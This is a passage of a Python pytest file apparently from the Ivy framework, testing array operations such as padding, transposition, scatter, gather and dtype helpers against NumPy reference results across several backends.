pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.constant_pad(x, pw, val)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.constant_pad, x, pw, val),
np.asarray(ivy.functional.backends.numpy.constant_pad(ivy.to_numpy(x), ivy.to_numpy(pw), val)))
# swapaxes
@pytest.mark.parametrize(
"x_n_ax0_n_ax1", [([[1.]], 0, 1), ([[0., 1., 2., 3.]], 1, 0), ([[[0., 1., 2.], [3., 4., 5.]]], -2, -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_swapaxes(x_n_ax0_n_ax1, dtype, tensor_fn, dev, call):
# smoke test
x, ax0, ax1 = x_n_ax0_n_ax1
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.swapaxes(x, ax0, ax1)
# type test
assert ivy.is_array(ret)
# cardinality test
expected_shape = list(x.shape)
expected_shape[ax0], expected_shape[ax1] = expected_shape[ax1], expected_shape[ax0]
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.swapaxes, x, ax0, ax1),
np.asarray(ivy.functional.backends.numpy.swapaxes(ivy.to_numpy(x), ax0, ax1)))
# transpose
@pytest.mark.parametrize(
"x_n_axes", [([[1.]], [1, 0]), ([[0., 1., 2., 3.]], [1, 0]), ([[[0., 1., 2.], [3., 4., 5.]]], [0, 2, 1])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_transpose(x_n_axes, dtype, tensor_fn, dev, call):
# smoke test
x, axes = x_n_axes
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.transpose(x, axes)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = x.shape
assert ret.shape == tuple([x.shape[idx] for idx in axes])
# value test
assert np.allclose(call(ivy.transpose, x, axes), np.asarray(ivy.functional.backends.numpy.transpose(ivy.to_numpy(x), axes)))
# expand_dims
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([1.], 0), ([[0., 1., 2., 3.]], -2), ([[[0., 1., 2.], [3., 4., 5.]]], -3)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_expand_dims(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.expand_dims(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# expected_shape = list(x.shape)
# expected_shape.insert(axis, 1)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.expand_dims, x, axis), np.asarray(ivy.functional.backends.numpy.expand_dims(ivy.to_numpy(x), axis)))
# where
@pytest.mark.parametrize(
"cond_n_x1_n_x2", [(True, 2., 3.), (0., 2., 3.), ([True], [2.], [3.]), ([[0.]], [[2., 3.]], [[4., 5.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_where(cond_n_x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
cond, x1, x2 = cond_n_x1_n_x2
if (isinstance(cond, Number) or isinstance(x1, Number) or isinstance(x2, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
cond = tensor_fn(cond, dtype, dev)
x1 = tensor_fn(x1, dtype, dev)
x2 = tensor_fn(x2, dtype, dev)
ret = ivy.where(cond, x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.where, cond, x1, x2),
np.asarray(ivy.functional.backends.numpy.where(ivy.to_numpy(cond), ivy.to_numpy(x1), ivy.to_numpy(x2))))
# indices_where
@pytest.mark.parametrize(
"x", [[True], [[0., 1.], [2., 3.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_indices_where(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.indices_where(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == 2
assert ret.shape[-1] == len(x.shape)
# value test
assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isfinite, x), res)
# reshape
@pytest.mark.parametrize(
"x_n_shp", [(1., (1, 1)), (1., 1), (1., []), ([[1.]], []), ([[0., 1.], [2., 3.]], (1, 4, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_reshape(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.reshape(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ((new_shape,) if isinstance(new_shape, int) else tuple(new_shape))
# value test
assert np.allclose(call(ivy.reshape, x, new_shape), np.asarray(ivy.functional.backends.numpy.reshape(ivy.to_numpy(x), new_shape)))
# broadcast_to
@pytest.mark.parametrize(
"x_n_shp", [([1.], (2, 1)), ([[0., 1.], [2., 3.]], (10, 2, 2))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_broadcast_to(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.broadcast_to(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == len(new_shape)
# value test
assert np.allclose(call(ivy.broadcast_to, x, new_shape),
np.asarray(ivy.functional.backends.numpy.broadcast_to(ivy.to_numpy(x), new_shape)))
# squeeze
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([[1.]], None), ([[[0.], [1.]], [[2.], [3.]]], -1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_squeeze(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.squeeze(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if axis is None:
# expected_shape = [item for item in x.shape if item != 1]
# elif x.shape == ():
# expected_shape = []
# else:
# expected_shape = list(x.shape)
# expected_shape.pop(axis)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.squeeze, x, axis), np.asarray(ivy.functional.backends.numpy.squeeze(ivy.to_numpy(x), axis)))
# zeros
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_zeros(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.zeros(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# zeros_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.zeros_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.zeros_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.zeros_like(ivy.to_numpy(x), dtype)))
# ones
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.ones(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.ones, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.ones(shape, dtype)))
# ones_like
# @pytest.mark.parametrize(
# "x", [1, [1], [[1], [2], [3]]])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones_like(x, dtype, tensor_fn, dev, call):
# # smoke test
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.ones_like(x, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.ones_like, x, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# full
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "fill_val", [2., -7.])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_full(shape, fill_val, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.full(shape, fill_val, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.full, shape, fill_val, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.full(shape, fill_val, dtype)))
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# cross
@pytest.mark.parametrize(
"x1_n_x2", [([0., 1., 2.], [3., 4., 5.]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4., 5.], [5., 4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.cross(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.cross, x1, x2), np.asarray(ivy.functional.backends.numpy.cross(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# matmul
@pytest.mark.parametrize(
"x1_n_x2", [([[0., 1., 2.]], [[3.], [4.], [5.]]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4.], [5., 5.], [4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_matmul(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.matmul(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape[:-1] + (x2.shape[-1],)
# value test
assert np.allclose(call(ivy.matmul, x1, x2), np.asarray(ivy.functional.backends.numpy.matmul(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# identity
@pytest.mark.parametrize(
"dim_n_bs", [(3, None), (1, (2, 3)), (5, (1, 2, 3))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_identity(dim_n_bs, dtype, tensor_fn, dev, call):
# smoke test
dim, bs = dim_n_bs
ret = ivy.identity(dim, dtype, bs, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (tuple(bs) if bs else ()) + (dim, dim)
# value test
assert np.allclose(call(ivy.identity, dim, dtype, bs, dev),
np.asarray(ivy.functional.backends.numpy.identity(dim, dtype, bs)))
# meshgrid
@pytest.mark.parametrize(
"xs", [([1, 2, 3], [4, 5, 6]), ([1, 2, 3], [4, 5, 6, 7], [8, 9])])
@pytest.mark.parametrize(
"indexing", ['xy', 'ij'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_meshgrid(xs, indexing, dtype, tensor_fn, dev, call):
# smoke test
xs_as_arrays = [ivy.array(x, 'int32', dev) for x in xs]
rets = ivy.meshgrid(*xs_as_arrays, indexing=indexing)
# type test
for ret in rets:
assert ivy.is_array(ret)
# cardinality test
target_shape = tuple([len(x) for x in xs])
if indexing == 'xy':
target_shape = (target_shape[1], target_shape[0]) + target_shape[2:]
for ret in rets:
assert ret.shape == target_shape
# value test
assert np.allclose(
call(ivy.meshgrid, *xs_as_arrays, indexing=indexing),
[np.asarray(i) for i in ivy.functional.backends.numpy.meshgrid(*[ivy.to_numpy(x) for x in xs_as_arrays], indexing=indexing)])
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size_n_tnsr_n_wdup", [([0, 4, 1, 2], [1, 2, 3, 4], 8, None, False),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8, None, True),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], None, [11, 10, 9, 8, 7, 6], True)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size_n_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, size, tensor, with_duplicates = inds_n_upd_n_size_n_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if size:
assert ret.shape == (size,)
else:
assert ret.shape == tensor.shape
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, tensor, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(
ivy.to_numpy(inds), ivy.to_numpy(upd), size,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red)))
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape_tnsr_n_wdup",
[([[4], [3], [1], [7]], [9, 10, 11, 12], [8], None, False), ([[0, 1, 2]], [1], [3, 3, 3], None, False),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4], None, False),
([[0, 1, 2]], [1], None, [[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
[[4, 5, 6], [7, 8, 9], [1, 2, 3]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]]], False)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, shape, tensor, with_duplicates = inds_n_upd_n_shape_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if shape:
assert tuple(ret.shape) == tuple(shape)
else:
assert tuple(ret.shape) == tuple(tensor.shape)
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
ret = call(ivy.scatter_nd, inds, upd, shape, tensor, red, dev)
true = np.asarray(ivy.functional.backends.numpy.scatter_nd(
ivy.to_numpy(inds), ivy.to_numpy(upd), shape,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red))
assert np.allclose(ret, true)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
# value test
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# dtype bits
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ivy.all_dtype_strs)
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_bits(x, dtype, tensor_fn, dev, call):
# smoke test
if ivy.invalid_dtype(dtype):
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype_bits(ivy.dtype(x))
# type test
assert isinstance(ret, int)
assert ret in [1, 8, 16, 32, 64]
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
